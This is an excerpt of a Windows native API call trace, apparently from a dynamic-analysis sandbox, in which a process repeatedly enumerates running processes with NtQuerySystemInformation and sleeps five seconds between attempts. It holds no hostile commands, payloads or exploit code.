NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.384] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.401] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.431] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.447] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.492] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.525] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.571] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.588] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.618] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.634] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.649] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.665] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.680] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 